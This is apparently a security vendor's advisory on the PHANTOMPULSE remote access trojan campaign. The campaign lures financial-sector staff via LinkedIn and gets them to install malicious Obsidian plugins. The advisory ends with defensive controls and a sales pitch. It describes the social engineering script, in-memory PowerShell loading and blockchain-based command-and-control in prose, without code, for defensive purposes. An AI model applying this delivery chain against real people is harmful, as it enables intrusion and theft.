PHANTOMPULSE RAT: When Your Note-Taking App Becomes a Weapon Against Financial Sector Employees

A sophisticated threat campaign, tracked as REF6598 by Elastic Security Labs, is actively targeting employees in the financial and cryptocurrency sectors with a previously undocumented Windows remote access trojan called PHANTOMPULSE — delivered not through a software vulnerability, but through a legitimate note-taking application that most security tools would never flag. The attack vector is Obsidian, a widely used knowledge management tool, and the entry point is a LinkedIn connection request from what appears to be a venture capital firm.

The Attack Chain: From LinkedIn to Full Compromise

The campaign begins with a calculated social engineering play. Threat actors approach targets on LinkedIn, presenting themselves as representatives of a venture capital firm seeking to onboard a new portfolio advisor or financial analyst. The conversation feels professional and credible — multiple "partners" are involved, references are provided, and the communication eventually moves to a Telegram group where several purported colleagues are present to reinforce legitimacy.

At the point of engagement, the target is told that the firm uses Obsidian as its internal "management database" and is asked to access a shared vault using provided credentials. Obsidian is a legitimate, respected tool — used by researchers, writers, and professionals globally. Installing a community plugin from a trusted-looking vault raises no immediate suspicion. That plugin, however, executes arbitrary code the moment it loads, bypassing traditional security controls entirely because no exploit is used — only Obsidian's own intended functionality.

On Windows, this triggers a PowerShell script that drops an intermediate loader called PHANTOMPULL, which decrypts and launches PHANTOMPULSE directly in memory — leaving no file on disk for endpoint detection tools to scan. On macOS, an obfuscated AppleScript dropper iterates over a hardcoded domain list and uses Telegram itself as a dead-drop resolver for fallback command-and-control (C2) communication.

PHANTOMPULSE: An AI-Generated Backdoor with Blockchain C2

PHANTOMPULSE is notable for two design choices that make detection and takedown significantly harder than conventional malware. First, it is AI-generated — its code structure, obfuscation patterns, and evasion logic appear to have been produced or assisted by a large language model, making signature-based detection unreliable. Second, it resolves its C2 server by querying the Ethereum blockchain — specifically, by fetching the latest transaction associated with a hardcoded wallet address. This means defenders cannot simply block a domain or IP to sever the malware's communications; the C2 address lives on an immutable public ledger.

Once active, PHANTOMPULSE provides attackers with comprehensive access: system telemetry collection, remote command execution, file upload and exfiltration, screenshot capture, and full keylogging. For a financial sector employee with access to trading systems, customer records, or internal banking portals, this level of access represents a catastrophic exposure.

Why This Threat Is Directly Relevant to Saudi Financial Institutions

Saudi banks, insurance companies, and fintech firms operate in an environment where LinkedIn is a primary professional networking channel. Relationship-based business culture means that receiving a well-crafted approach from a "VC partner" is entirely plausible — and employees in investment, treasury, compliance, and corporate development functions are precisely the high-value targets REF6598 pursues. SAMA's Cyber Security Framework (CSCC) Domain 3 (Human Cybersecurity) mandates security awareness training, but most programs do not cover application-layer social engineering of this sophistication. The PHANTOMPULSE campaign exploits that gap deliberately. Furthermore, because the attack uses no exploitable CVE and abuses a legitimate tool, the traditional vulnerability management controls prescribed under CSCC Domain 4 (Asset and Vulnerability Management) offer no direct protection here — this is a controls gap that requires specific attention.

Detection, Defense, and Recommended Controls

1. Block or restrict Obsidian community plugins via endpoint policy: If your organisation does not officially use Obsidian, add it to your software blocklist. If it is used, disable the community plugin ecosystem through GPO or MDM — only curated, approved plugins should be permitted in a financial institution environment.
2. Deploy behavioral EDR rules for PowerShell memory injection: PHANTOMPULSE relies on PowerShell-based in-memory execution via PHANTOMPULL. Elastic, CrowdStrike, and SentinelOne have all released detection rules for the REF6598 chain; ensure your SOC has these signatures loaded and is monitoring for anomalous PowerShell activity, especially processes spawned by note-taking or productivity applications.
3. Monitor for Ethereum RPC calls from endpoints: An endpoint querying blockchain APIs (such as etherscan.io or public Ethereum nodes) outside of an approved fintech workflow is highly anomalous and warrants immediate investigation. Implement DNS and proxy-layer blocking of known blockchain API endpoints for non-authorised workstations.
4. Update security awareness training to include application-layer lures: Phishing simulation programmes should include scenarios in which targets are asked to install or use "legitimate" software as part of an onboarding or collaboration flow. The REF6598 campaign succeeds precisely because it does not look like a phishing email.
5. Apply zero-trust segmentation to workstations with financial system access: Even if an endpoint is compromised, lateral movement and data exfiltration should be constrained by micro-segmentation. Ensure that employees with access to core banking, treasury, or customer data platforms operate on network segments with strict outbound controls aligned with NCA ECC Control 2-5 (Network Security Management).
6. Implement LinkedIn and social media usage policies: Define clear guidelines for how employees should respond to unsolicited outreach requesting installation of software or access to external platforms. Require that any such request be escalated to the security team before action is taken.

Conclusion

PHANTOMPULSE represents a maturation in threat actor tradecraft: moving from exploit-based delivery to social trust exploitation, from traditional C2 infrastructure to blockchain-based resilience, and from commodity malware to AI-assisted tooling. For Saudi financial institutions that have invested heavily in perimeter defences, endpoint detection, and vulnerability patching, this campaign is a reminder that attackers are deliberately engineering around those investments. The attack surface now includes your employees' professional identities and the productivity software they use daily.

SAMA CSCC compliance provides the mandatory baseline, but defending against REF6598-class threats requires security awareness programmes, endpoint behavioural controls, and network-layer visibility that go beyond checklist compliance.

Is your organisation prepared for application-layer social engineering? Contact Fyntralink for a complimentary SAMA Cyber Maturity Assessment and a tailored security awareness gap analysis for your financial institution.